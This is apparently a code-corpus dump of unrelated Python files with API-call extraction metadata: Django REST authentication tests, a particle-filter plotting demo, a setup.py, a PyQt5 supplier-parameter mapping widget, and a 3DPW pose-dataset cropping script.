'rDataSize']"}), "(records, columns=['rStartChromIx', 'rStartBase',\n 'rEndChromIx', 'rEndBase', 'rdataOffset', 'rDataSize'])\n", (3062, 3171), False, 'import pandas\n'), ((3455, 3482), 'epivizfileserver.parser.BigWig', 'BigWig', (['(baseurl + file.name)'], {}), '(baseurl + file.name)\n', (3461, 3482), False, 'from epivizfileserver.parser import BigWig\n'), ((918, 941), 'joblib.delayed', 'delayed', (['get_file_index'], {}), '(get_file_index)\n', (925, 941), False, 'from joblib import Parallel, delayed\n'), ((1341, 1379), 'struct.unpack', 'struct.unpack', (["(endian + 'IIIIQQ')", 'data'], {}), "(endian + 'IIIIQQ', data)\n", (1354, 1379), False, 'import struct\n'), ((1686, 1723), 'struct.unpack', 'struct.unpack', (["(endian + 'IIIIQ')", 'data'], {}), "(endian + 'IIIIQ', data)\n", (1699, 1723), False, 'import struct\n')] |
from os import stat
from django.contrib.auth import get_user_model
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.utils.encoding import smart_str, smart_bytes
from django.utils.http import urlsafe_base64_decode, urlsafe_base64_encode
from django.test.utils import override_settings
from rest_framework.exceptions import ValidationError
from rest_framework.test import APITestCase
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework_simplejwt.exceptions import TokenError
from decouple import config
# getting user model
User = get_user_model()
@override_settings(EMAIL_BACKEND=config("EMAIL_BACKEND"))
class AuthenticationTests(APITestCase):
def setUp(self):
login_user_via_email_url = reverse("users:login_via_email")
login_user_via_email_data = {
"email": "<EMAIL>",
"password": "<PASSWORD>"
}
self.logout_url = reverse("users:logout")
self.user = User.objects.create_user(email="<EMAIL>", username="online", phone_number="09335008000", password="<PASSWORD>")
self.user2 = User.objects.create_user(email="<EMAIL>", username="online2", phone_number="09335007000", password="<PASSWORD>")
self.login_user_via_email = self.client.post(login_user_via_email_url, login_user_via_email_data)
self.tokens_for_logout = self.login_user_via_email.json()
self.reset_password_uidb64 = urlsafe_base64_encode(smart_bytes(self.user.pk))
self.reset_password_token = PasswordResetTokenGenerator().make_token(self.user)
def test_registeration(self):
registeration_url = reverse("users:registeration")
registeration_data = {
"email": "<EMAIL>",
"username": "user",
"phone_number": "09122004000",
"password": "<PASSWORD>",
"repeated_password": "<PASSWORD>"
}
registeration_response = self.client.post(registeration_url, registeration_data)
# testing part
self.assertEqual(registeration_response.status_code, status.HTTP_201_CREATED)
def test_login_via_email(self):
login_via_email_url = reverse("users:login_via_email")
login_via_email_data = {
"email": "<EMAIL>",
"password": "<PASSWORD>"
}
login_via_email_response = self.client.post(login_via_email_url, login_via_email_data)
# testing part
self.assertEqual(login_via_email_response.status_code, status.HTTP_200_OK)
def test_login_via_phone_number(self):
login_via_phone_url = reverse("users:login_via_phoneNumber")
login_via_phone_data = {
"phone_number": "09335008000",
"password": "<PASSWORD>"
}
login_via_phone_response = self.client.post(login_via_phone_url, login_via_phone_data)
# testing part
self.assertEqual(login_via_phone_response.status_code, status.HTTP_200_OK)
def test_logout(self):
logout_data = {"refresh": self.tokens_for_logout["refresh"]}
self.client.credentials(HTTP_AUTHORIZATION="Bearer " + str(self.tokens_for_logout["access"]))
logout_response = self.client.post(self.logout_url, logout_data)
# testing part
self.assertEqual(logout_response.status_code, status.HTTP_204_NO_CONTENT)
def test_logout_with_bad_refresh_token(self):
logout_data = {"refresh": "SuperTrashRefreshToken"}
self.client.credentials(HTTP_AUTHORIZATION="Bearer " + str(self.tokens_for_logout["access"]))
logout_response = self.client.post(self.logout_url, logout_data)
# testing part
self.assertEqual(logout_response.status_code, status.HTTP_400_BAD_REQUEST)
def test_logout_with_already_blacklisted_refresh_token(self):
logout_data = {"refresh": self.tokens_for_logout["refresh"]}
self.client.credentials(HTTP_AUTHORIZATION="Bearer " + str(self.tokens_for_logout["access"]))
logout_response = self.client.post(self.logout_url, logout_data)
logout_response_second_try = self.client.post(self.logout_url, logout_data)
# testing part
self.assertEqual(logout_response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(logout_response_second_try.status_code, status.HTTP_400_BAD_REQUEST)
def test_request_reset_password_link(self):
request_reset_password_link_url = reverse("users:reset_password")
request_reset_password_link_data = {"email": "<EMAIL>"}
request_rest_password_link_response = self.client.post(request_reset_password_link_url, request_reset_password_link_data)
# testing part
self.assertEqual(request_rest_password_link_response.status_code, status.HTTP_200_OK)
def test_check_reset_password_link(self):
check_reset_password_link_url = reverse("users:reset_password_confirm", kwargs={"uidb64": self.reset_password_uidb64, "token": self.reset_password_token})
check_reset_password_link_response = self.client.get(check_reset_password_link_url)
# testing part
self.assertEqual(check_reset_password_link_response.status_code, status.HTTP_202_ACCEPTED)
def test_set_new_password(self):
set_new_password_url = reverse("users:reset_password_confirm")
set_new_password_data = {"password": "<PASSWORD>password", "repeated_password": "<PASSWORD>", "uidb64": self.reset_password_uidb64, "token": self.reset_password_token}
set_new_password_response = self.client.patch(set_new_password_url, set_new_password_data)
# testing part
self.assertEqual(set_new_password_response.status_code, status.HTTP_200_OK)
| [
"django.contrib.auth.get_user_model",
"django.contrib.auth.tokens.PasswordResetTokenGenerator",
"decouple.config",
"django.utils.encoding.smart_bytes",
"rest_framework.reverse.reverse"
] | [((605, 621), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (619, 621), False, 'from django.contrib.auth import get_user_model\n'), ((777, 809), 'rest_framework.reverse.reverse', 'reverse', (['"""users:login_via_email"""'], {}), "('users:login_via_email')\n", (784, 809), False, 'from rest_framework.reverse import reverse\n'), ((954, 977), 'rest_framework.reverse.reverse', 'reverse', (['"""users:logout"""'], {}), "('users:logout')\n", (961, 977), False, 'from rest_framework.reverse import reverse\n'), ((1654, 1684), 'rest_framework.reverse.reverse', 'reverse', (['"""users:registeration"""'], {}), "('users:registeration')\n", (1661, 1684), False, 'from rest_framework.reverse import reverse\n'), ((2192, 2224), 'rest_framework.reverse.reverse', 'reverse', (['"""users:login_via_email"""'], {}), "('users:login_via_email')\n", (2199, 2224), False, 'from rest_framework.reverse import reverse\n'), ((2614, 2652), 'rest_framework.reverse.reverse', 'reverse', (['"""users:login_via_phoneNumber"""'], {}), "('users:login_via_phoneNumber')\n", (2621, 2652), False, 'from rest_framework.reverse import reverse\n'), ((4464, 4495), 'rest_framework.reverse.reverse', 'reverse', (['"""users:reset_password"""'], {}), "('users:reset_password')\n", (4471, 4495), False, 'from rest_framework.reverse import reverse\n'), ((4899, 5026), 'rest_framework.reverse.reverse', 'reverse', (['"""users:reset_password_confirm"""'], {'kwargs': "{'uidb64': self.reset_password_uidb64, 'token': self.reset_password_token}"}), "('users:reset_password_confirm', kwargs={'uidb64': self.\n reset_password_uidb64, 'token': self.reset_password_token})\n", (4906, 5026), False, 'from rest_framework.reverse import reverse\n'), ((5314, 5353), 'rest_framework.reverse.reverse', 'reverse', (['"""users:reset_password_confirm"""'], {}), "('users:reset_password_confirm')\n", (5321, 5353), False, 'from rest_framework.reverse import reverse\n'), ((656, 679), 'decouple.config', 'config', (['"""EMAIL_BACKEND"""'], {}), "('EMAIL_BACKEND')\n", (662, 679), False, 'from decouple import config\n'), ((1476, 1501), 'django.utils.encoding.smart_bytes', 'smart_bytes', (['self.user.pk'], {}), '(self.user.pk)\n', (1487, 1501), False, 'from django.utils.encoding import smart_str, smart_bytes\n'), ((1539, 1568), 'django.contrib.auth.tokens.PasswordResetTokenGenerator', 'PasswordResetTokenGenerator', ([], {}), '()\n', (1566, 1568), False, 'from django.contrib.auth.tokens import PasswordResetTokenGenerator\n')] |
# -*- coding: utf-8 -*-
"""Copyright 2015 <NAME>.
Code supporting the book
Kalman and Bayesian Filters in Python
https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python
This is licensed under an MIT license. See the LICENSE.txt file
for more information.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import math
import matplotlib.pyplot as plt
import numpy as np
from numpy.random import uniform
from numpy.random import randn
import scipy.stats
import random
if __name__ == '__main__':
N = 2000
pf = ParticleFilter(N, 100, 100)
#pf.particles[:,2] = np.random.randn(pf.N)*np.radians(10) + np.radians(45)
z = np.array([20, 20])
#pf.create_particles(mean=z, variance=40)
mu0 = np.array([0., 0.])
plt.plot(pf, weights=False)
fig = plt.gcf()
#fig.show()
#fig.canvas.draw()
#plt.ioff()
for x in range(10):
z[0] = x+1 + randn()*0.3
z[1] = x+1 + randn()*0.3
pf.predict((1,1), (0.2, 0.2))
pf.weight(z=z, var=.8)
neff = pf.neff()
print('neff', neff)
if neff < N/2 or N <= 2000:
pf.resample()
mu, var = pf.estimate()
if x == 0:
mu0 = mu
#print(mu - z)
#print(var)
plot(pf, weights=True)
#plt.plot(z[0], z[1], marker='v', c='r', ms=10)
plt.plot(x+1, x+1, marker='*', c='r', ms=10)
plt.scatter(mu[0], mu[1], c='g', s=100)#,
#s=min(500, abs((1./np.sum(var)))*20), alpha=0.5)
plt.plot([0,100], [0,100])
plt.tight_layout()
plt.pause(.002)
#fig.canvas.draw()
#pf.assign_speed_by_gaussian(1, 1.5)
#pf.move(h=[1,1], v=1.4, t=1)
#pf.control(mu-mu0)
mu0 = mu
plt.ion()
| [
"matplotlib.pyplot.gcf",
"matplotlib.pyplot.plot",
"numpy.array",
"matplotlib.pyplot.scatter",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.ion",
"matplotlib.pyplot.pause",
"numpy.random.randn"
] | [((747, 765), 'numpy.array', 'np.array', (['[20, 20]'], {}), '([20, 20])\n', (755, 765), True, 'import numpy as np\n'), ((826, 846), 'numpy.array', 'np.array', (['[0.0, 0.0]'], {}), '([0.0, 0.0])\n', (834, 846), True, 'import numpy as np\n'), ((850, 877), 'matplotlib.pyplot.plot', 'plt.plot', (['pf'], {'weights': '(False)'}), '(pf, weights=False)\n', (858, 877), True, 'import matplotlib.pyplot as plt\n'), ((893, 902), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (900, 902), True, 'import matplotlib.pyplot as plt\n'), ((1901, 1910), 'matplotlib.pyplot.ion', 'plt.ion', ([], {}), '()\n', (1908, 1910), True, 'import matplotlib.pyplot as plt\n'), ((1474, 1522), 'matplotlib.pyplot.plot', 'plt.plot', (['(x + 1)', '(x + 1)'], {'marker': '"""*"""', 'c': '"""r"""', 'ms': '(10)'}), "(x + 1, x + 1, marker='*', c='r', ms=10)\n", (1482, 1522), True, 'import matplotlib.pyplot as plt\n'), ((1528, 1567), 'matplotlib.pyplot.scatter', 'plt.scatter', (['mu[0]', 'mu[1]'], {'c': '"""g"""', 's': '(100)'}), "(mu[0], mu[1], c='g', s=100)\n", (1539, 1567), True, 'import matplotlib.pyplot as plt\n'), ((1650, 1678), 'matplotlib.pyplot.plot', 'plt.plot', (['[0, 100]', '[0, 100]'], {}), '([0, 100], [0, 100])\n', (1658, 1678), True, 'import matplotlib.pyplot as plt\n'), ((1686, 1704), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1702, 1704), True, 'import matplotlib.pyplot as plt\n'), ((1714, 1730), 'matplotlib.pyplot.pause', 'plt.pause', (['(0.002)'], {}), '(0.002)\n', (1723, 1730), True, 'import matplotlib.pyplot as plt\n'), ((1012, 1019), 'numpy.random.randn', 'randn', ([], {}), '()\n', (1017, 1019), False, 'from numpy.random import randn\n'), ((1046, 1053), 'numpy.random.randn', 'randn', ([], {}), '()\n', (1051, 1053), False, 'from numpy.random import randn\n')] |
import setuptools
setuptools.setup(
name='pipns',
version='0.0.12',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/nvllsvm/pipns',
license='MIT',
packages=['pipns'],
entry_points={'console_scripts': ['pipns=pipns.__main__:main']},
package_data={'pipns': ['scripts/*.py']},
install_requires=['pipenv'],
python_requires='>=3.7')
| [
"setuptools.setup"
] | [((19, 362), 'setuptools.setup', 'setuptools.setup', ([], {'name': '"""pipns"""', 'version': '"""0.0.12"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/nvllsvm/pipns"""', 'license': '"""MIT"""', 'packages': "['pipns']", 'entry_points': "{'console_scripts': ['pipns=pipns.__main__:main']}", 'package_data': "{'pipns': ['scripts/*.py']}", 'install_requires': "['pipenv']", 'python_requires': '""">=3.7"""'}), "(name='pipns', version='0.0.12', author='<NAME>',\n author_email='<EMAIL>', url='https://github.com/nvllsvm/pipns', license\n ='MIT', packages=['pipns'], entry_points={'console_scripts': [\n 'pipns=pipns.__main__:main']}, package_data={'pipns': ['scripts/*.py']},\n install_requires=['pipenv'], python_requires='>=3.7')\n", (35, 362), False, 'import setuptools\n')] |
from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout
from PyQt5.QtGui import QFont, QFontMetrics
from PyQt5 import QtGui
from json_appdata import *
import utils
labels = []
lineEdits = {}
jsonFile = 'supplier_parameter_mapping.json'
class ParameterMappingGroupBox(QGroupBox):
def __init__(self, tableList, tableColumnsList, supplierList):
super().__init__("Parameter mapping")
self.tableColumnsList = tableColumnsList
self.paramsDicts = {}
fm = QFontMetrics(QFont(QtGui.QGuiApplication.font().family(), QtGui.QGuiApplication.font().pointSize()))
self.textHeight = fm.boundingRect("Text").height()
for supplier in supplierList:
self.paramsDicts[supplier] = {}
for i, table in enumerate(tableList):
self.paramsDicts[supplier][table] = {}
for dbParam in tableColumnsList[i]:
self.paramsDicts[supplier][table][dbParam] = dbParam
configDict = loadFromJson(jsonFile)
if len(configDict) > 0:
self.paramsDicts = configDict
self.dbParamsColumn = 0
self.equalsLabelColumn = 2
self.supplierParamsColumn = 3
self.comboBoxRow = 0
self.labelRow = 1
self.fieldsRow = 2
self.mainGridLayout = QGridLayout()
self.setLayout(self.mainGridLayout)
self.dbTableLabel = QLabel("Database Table:")
self.mainGridLayout.addWidget(self.dbTableLabel, self.comboBoxRow, self.dbParamsColumn)
self.tableListComboBox = QComboBox()
self.tableListComboBox.addItems(tableList)
self.tableListComboBox.setCurrentIndex(0)
self.tableListComboBox.currentTextChanged.connect(self.updateTableMappingFields)
self.mainGridLayout.addWidget(self.tableListComboBox, self.comboBoxRow, self.dbParamsColumn + 1)
self.supplierTableLabel = QLabel("Supplier:")
self.mainGridLayout.addWidget(self.supplierTableLabel, self.comboBoxRow, self.supplierParamsColumn)
self.supplierListComboBox = QComboBox()
self.supplierListComboBox.addItems(supplierList)
self.supplierListComboBox.currentTextChanged.connect(self.updateTableMappingFields)
self.mainGridLayout.addWidget(self.supplierListComboBox, self.comboBoxRow, self.supplierParamsColumn + 1)
self.mainGridLayout.setSpacing(self.textHeight * 0.6)
self.mainGridLayout.setColumnMinimumWidth(2, self.textHeight * 3)
self.dbParamLabel = QLabel("Database Field Name")
self.mainGridLayout.addWidget(self.dbParamLabel, self.labelRow, self.dbParamsColumn)
self.supParamLabel = QLabel("Supplier Parameter")
self.mainGridLayout.addWidget(self.supParamLabel, self.labelRow, self.supplierParamsColumn)
self.saveButton = QPushButton("Save")
self.saveButton.setEnabled(False)
self.saveButton.setProperty('accent', True)
self.saveButton.released.connect(self.saveCmd)
self.mainGridLayout.addWidget(self.saveButton, self.fieldsRow, self.supplierParamsColumn + 1)
self.updateTableMappingFields()
def updateTableMappingFields(self):
row = self.fieldsRow
supplier = self.supplierListComboBox.currentText()
table = self.tableListComboBox.currentText()
for label in labels:
label.deleteLater()
labels.clear()
for k in lineEdits:
lineEdits[k].deleteLater()
lineEdits.clear()
self.mainGridLayout.takeAt(self.mainGridLayout.indexOf(self.saveButton))
for param in self.tableColumnsList[self.tableListComboBox.currentIndex()]:
dbLineEdit = QLineEdit(param)
dbLineEdit.setReadOnly(True)
lineEdits[param] = dbLineEdit
self.mainGridLayout.addWidget(dbLineEdit, row, self.dbParamsColumn, 1, 2)
supplierLineEdit = QLineEdit()
supplierLineEdit.setText(self.paramsDicts[supplier][table][param])
supplierLineEdit.textChanged.connect(lambda: self.saveButton.setEnabled(True))
supplierLineEdit.textChanged.connect(lambda string, t=table, s=supplier, p=param:
utils.assignToDict(self.paramsDicts[s][t],
lineEdits[p].text(),
string))
lineEdits[param + "_s"] = supplierLineEdit
self.mainGridLayout.addWidget(supplierLineEdit, row, self.supplierParamsColumn, 1, 2)
row += 1
self.mainGridLayout.addWidget(self.saveButton, row, self.supplierParamsColumn + 1)
def saveCmd(self):
saveToJson(jsonFile, self.paramsDicts)
self.saveButton.setEnabled(False)
def getParamsDict(self, supplier, table):
return self.paramsDicts[supplier][table]
| [
"PyQt5.QtWidgets.QComboBox",
"PyQt5.QtWidgets.QGridLayout",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QPushButton",
"PyQt5.QtWidgets.QLineEdit",
"PyQt5.QtGui.QGuiApplication.font"
] | [((1390, 1403), 'PyQt5.QtWidgets.QGridLayout', 'QGridLayout', ([], {}), '()\n', (1401, 1403), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((1480, 1505), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Database Table:"""'], {}), "('Database Table:')\n", (1486, 1505), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((1639, 1650), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (1648, 1650), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((1987, 2006), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Supplier:"""'], {}), "('Supplier:')\n", (1993, 2006), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((2155, 2166), 'PyQt5.QtWidgets.QComboBox', 'QComboBox', ([], {}), '()\n', (2164, 2166), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((2602, 2631), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Database Field Name"""'], {}), "('Database Field Name')\n", (2608, 2631), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((2758, 2786), 'PyQt5.QtWidgets.QLabel', 'QLabel', (['"""Supplier Parameter"""'], {}), "('Supplier Parameter')\n", (2764, 2786), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((2917, 2936), 'PyQt5.QtWidgets.QPushButton', 'QPushButton', (['"""Save"""'], {}), "('Save')\n", (2928, 2936), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((3803, 3819), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', (['param'], {}), '(param)\n', (3812, 3819), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((4026, 4037), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\n', (4035, 4037), False, 'from PyQt5.QtWidgets import QWidget, QLabel, QLineEdit, QComboBox, QGroupBox, QPushButton, QGridLayout\n'), ((575, 603), 'PyQt5.QtGui.QGuiApplication.font', 'QtGui.QGuiApplication.font', ([], {}), '()\n', (601, 603), False, 'from PyQt5 import QtGui\n'), ((614, 642), 'PyQt5.QtGui.QGuiApplication.font', 'QtGui.QGuiApplication.font', ([], {}), '()\n', (640, 642), False, 'from PyQt5 import QtGui\n')] |
import os
import cv2
import numpy as np
import torch
import pickle
import argparse
from configs import paths
from utils.cam_utils import perspective_project_torch
from models.smpl_official import SMPL
def rotate_2d(pt_2d, rot_rad):
x = pt_2d[0]
y = pt_2d[1]
sn, cs = np.sin(rot_rad), np.cos(rot_rad)
xx = x * cs - y * sn
yy = x * sn + y * cs
return np.array([xx, yy], dtype=np.float32)
def gen_trans_from_patch_cv(c_x, c_y, src_width, src_height, dst_width, dst_height, scale, rot, inv=False):
# augment size with scale
src_w = src_width * scale
src_h = src_height * scale
src_center = np.zeros(2)
src_center[0] = c_x
src_center[1] = c_y # np.array([c_x, c_y], dtype=np.float32)
# augment rotation
rot_rad = np.pi * rot / 180
src_downdir = rotate_2d(np.array([0, src_h * 0.5], dtype=np.float32), rot_rad)
src_rightdir = rotate_2d(np.array([src_w * 0.5, 0], dtype=np.float32), rot_rad)
dst_w = dst_width
dst_h = dst_height
dst_center = np.array([dst_w * 0.5, dst_h * 0.5], dtype=np.float32)
dst_downdir = np.array([0, dst_h * 0.5], dtype=np.float32)
dst_rightdir = np.array([dst_w * 0.5, 0], dtype=np.float32)
src = np.zeros((3, 2), dtype=np.float32)
src[0, :] = src_center
src[1, :] = src_center + src_downdir
src[2, :] = src_center + src_rightdir
dst = np.zeros((3, 2), dtype=np.float32)
dst[0, :] = dst_center
dst[1, :] = dst_center + dst_downdir
dst[2, :] = dst_center + dst_rightdir
if inv:
trans = cv2.getAffineTransform(np.float32(dst), np.float32(src))
else:
trans = cv2.getAffineTransform(np.float32(src), np.float32(dst))
return trans
def generate_patch_image_cv(cvimg, c_x, c_y, bb_width, bb_height, patch_width, patch_height,
do_flip, scale, rot):
img = cvimg.copy()
img_height, img_width, img_channels = img.shape
if do_flip:
img = img[:, ::-1, :]
c_x = img_width - c_x - 1
trans = gen_trans_from_patch_cv(c_x, c_y, bb_width, bb_height, patch_width, patch_height, scale, rot, inv=False)
img_patch = cv2.warpAffine(img, trans, (int(patch_width), int(patch_height)),
flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT)
return img_patch, trans
def get_single_image_crop(image, bbox, scale=1.2, crop_size=224):
if isinstance(image, str):
if os.path.isfile(image):
image = cv2.cvtColor(cv2.imread(image), cv2.COLOR_BGR2RGB)
else:
print(image)
raise BaseException(image, 'is not a valid file!')
elif not isinstance(image, np.ndarray):
raise('Unknown type for object', type(image))
crop_image, trans = generate_patch_image_cv(
cvimg=image.copy(),
c_x=bbox[0],
c_y=bbox[1],
bb_width=bbox[2],
bb_height=bbox[3],
patch_width=crop_size,
patch_height=crop_size,
do_flip=False,
scale=scale,
rot=0,
)
return crop_image
def pw3d_eval_extract(dataset_path, out_path, crop_wh=512):
bbox_scale_factor = 1.2
smpl_male = SMPL(paths.SMPL, batch_size=1, gender='male').to(device)
smpl_female = SMPL(paths.SMPL, batch_size=1, gender='female').to(device)
# imgnames_, scales_, centers_, parts_ = [], [], [], []
cropped_frame_fnames_, whs_, centers_, = [], [], []
poses_, shapes_, genders_ = [], [], []
sequence_files = sorted([os.path.join(dataset_path, 'sequenceFiles', 'test', f)
for f in os.listdir(os.path.join(dataset_path, 'sequenceFiles', 'test'))
if f.endswith('.pkl')])
for filename in sequence_files:
print('\n\n\n', filename)
with open(filename, 'rb') as f:
data = pickle.load(f, encoding='latin1')
smpl_poses = data['poses'] # list of (num frames, 72) pose params for each person
smpl_betas = data['betas'] # list of (10,) or (300,) shape params for each person
poses2d = data['poses2d'] # list of (num frames, 3, 18) 2d kps for each person
cam_extrinsics = data['cam_poses'] # array of (num frames, 4, 4) cam extrinsics
cam_K = data['cam_intrinsics'] # array of (3, 3) cam intrinsics.
genders = data['genders'] # list of genders for each person
valid = data['campose_valid'] # list of (num frames,) boolean arrays for each person, indicating whether camera pose has been aligned to that person (for trans).
trans = data['trans'] # list of (num frames, 3) translations in SMPL space for each person, to align them with image data (after projection)
num_people = len(smpl_poses) # Number of people in sequence
num_frames = len(smpl_poses[0]) # Number of frames in sequence
seq_name = str(data['sequence'])
print('smpl poses', len(smpl_poses), smpl_poses[0].shape,
'smpl betas', len(smpl_betas), smpl_betas[0].shape,
'poses2d', len(poses2d), poses2d[0].shape,
'global poses', cam_extrinsics.shape,
'cam_K', cam_K.shape,
'genders', genders, type(genders),
'valid', len(valid), valid[0].shape, np.sum(valid[0]), np.sum(valid[-1]),
'trans', len(trans), trans[0].shape,
'num people', num_people, 'num frames', num_frames, 'seq name', seq_name, '\n')
cam_K = torch.from_numpy(cam_K[None, :]).float().to(device)
for person_num in range(num_people):
# Get valid frames flags, shape and gender
valid_frames = valid[person_num].astype(np.bool)
shape = smpl_betas[person_num][:10]
torch_shape = torch.from_numpy(shape[None, :]).float().to(device)
gender = genders[person_num]
for frame_num in range(num_frames):
if valid_frames[frame_num]: # Only proceed if frame has valid camera pose for person
# Get bounding box using projected vertices
pose = smpl_poses[person_num][frame_num]
cam_R = cam_extrinsics[frame_num][:3, :3]
cam_t = cam_extrinsics[frame_num][:3, 3]
frame_trans = trans[person_num][frame_num]
pose = torch.from_numpy(pose[None, :]).float().to(device)
cam_t = torch.from_numpy(cam_t[None, :]).float().to(device)
cam_R = torch.from_numpy(cam_R[None, :, :]).float().to(device)
frame_trans = torch.from_numpy(frame_trans[None, :]).float().to(device)
if gender == 'm':
smpl_out = smpl_male(body_pose=pose[:, 3:],
global_orient=pose[:, :3],
betas=torch_shape,
transl=frame_trans)
elif gender == 'f':
smpl_out = smpl_female(body_pose=pose[:, 3:],
global_orient=pose[:, :3],
betas=torch_shape,
transl=frame_trans)
vertices = smpl_out.vertices
projected_aligned_vertices = perspective_project_torch(vertices, cam_R,
cam_t, cam_K=cam_K)
projected_aligned_vertices = projected_aligned_vertices[0].cpu().detach().numpy()
bbox = [min(projected_aligned_vertices[:, 0]),
min(projected_aligned_vertices[:, 1]),
max(projected_aligned_vertices[:, 0]),
max(projected_aligned_vertices[:, 1])] # (x1, y1, x2, y2) where x is cols and y is rows from top right corner.
center = [(bbox[2] + bbox[0]) / 2, (bbox[3] + bbox[1]) / 2]
wh = max(bbox[2] - bbox[0], bbox[3] - bbox[1])
# Save cropped frame using bounding box
image_fpath = os.path.join(dataset_path, 'imageFiles', seq_name,
'image_{}.jpg'.format(str(frame_num).zfill(5)))
image = cv2.imread(image_fpath)
centre_wh_bbox = center + [wh, wh]
cropped_image = get_single_image_crop(image, centre_wh_bbox,
scale=bbox_scale_factor,
crop_size=crop_wh)
cropped_image_fname = seq_name + '_image_{}_person_{}.png'.format(str(frame_num).zfill(5),
str(person_num).zfill(3))
cropped_image_fpath = os.path.join(out_path, 'cropped_frames',
cropped_image_fname)
cv2.imwrite(cropped_image_fpath, cropped_image)
# Transform global using cam extrinsics pose before storing
pose = pose[0].cpu().detach().numpy()
cam_R = cam_R[0].cpu().detach().numpy()
pose[:3] = cv2.Rodrigues(np.dot(cam_R, cv2.Rodrigues(pose[:3])[0]))[0].T[0]
# Store everything in lists
cropped_frame_fnames_.append(cropped_image_fname)
centers_.append(center)
whs_.append(wh)
poses_.append(pose)
shapes_.append(shape)
genders_.append(gender)
# print(cropped_image_fname, shape.shape, pose.shape, center, wh, gender)
# Store all data in npz file.
out_file = os.path.join(out_path, '3dpw_test.npz')
np.savez(out_file, imgname=cropped_frame_fnames_,
center=centers_,
wh=whs_,
pose=poses_,
shape=shapes_,
gender=genders_)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dataset_path', type=str)
args = parser.parse_args()
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print('\nDevice: {}'.format(device))
out_path = os.path.join(args.dataset_path, 'test')
if not os.path.isdir(out_path):
os.makedirs(os.path.join(out_path, 'cropped_frames'))
pw3d_eval_extract(args.dataset_path, out_path)
| [
"torch.from_numpy",
"numpy.array",
"torch.cuda.is_available",
"numpy.sin",
"numpy.savez",
"argparse.ArgumentParser",
"os.path.isdir",
"pickle.load",
"os.path.isfile",
"numpy.cos",
"cv2.imread",
"cv2.imwrite",
"utils.cam_utils.perspective_project_torch",
"os.path.join",
"numpy.sum",
"nu... | [((377, 413), 'numpy.array', 'np.array', (['[xx, yy]'], {'dtype': 'np.float32'}), '([xx, yy], dtype=np.float32)\n', (385, 413), True, 'import numpy as np\n'), ((632, 643), 'numpy.zeros', 'np.zeros', (['(2)'], {}), '(2)\n', (640, 643), True, 'import numpy as np\n'), ((1018, 1072), 'numpy.array', 'np.array', (['[dst_w * 0.5, dst_h * 0.5]'], {'dtype': 'np.float32'}), '([dst_w * 0.5, dst_h * 0.5], dtype=np.float32)\n', (1026, 1072), True, 'import numpy as np\n'), ((1091, 1135), 'numpy.array', 'np.array', (['[0, dst_h * 0.5]'], {'dtype': 'np.float32'}), '([0, dst_h * 0.5], dtype=np.float32)\n', (1099, 1135), True, 'import numpy as np\n'), ((1155, 1199), 'numpy.array', 'np.array', (['[dst_w * 0.5, 0]'], {'dtype': 'np.float32'}), '([dst_w * 0.5, 0], dtype=np.float32)\n', (1163, 1199), True, 'import numpy as np\n'), ((1211, 1245), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'np.float32'}), '((3, 2), dtype=np.float32)\n', (1219, 1245), True, 'import numpy as np\n'), ((1367, 1401), 'numpy.zeros', 'np.zeros', (['(3, 2)'], {'dtype': 'np.float32'}), '((3, 2), dtype=np.float32)\n', (1375, 1401), True, 'import numpy as np\n'), ((9858, 9897), 'os.path.join', 'os.path.join', (['out_path', '"""3dpw_test.npz"""'], {}), "(out_path, '3dpw_test.npz')\n", (9870, 9897), False, 'import os\n'), ((9902, 10026), 'numpy.savez', 'np.savez', (['out_file'], {'imgname': 'cropped_frame_fnames_', 'center': 'centers_', 'wh': 'whs_', 'pose': 'poses_', 'shape': 'shapes_', 'gender': 'genders_'}), '(out_file, imgname=cropped_frame_fnames_, center=centers_, wh=whs_,\n pose=poses_, shape=shapes_, gender=genders_)\n', (9910, 10026), True, 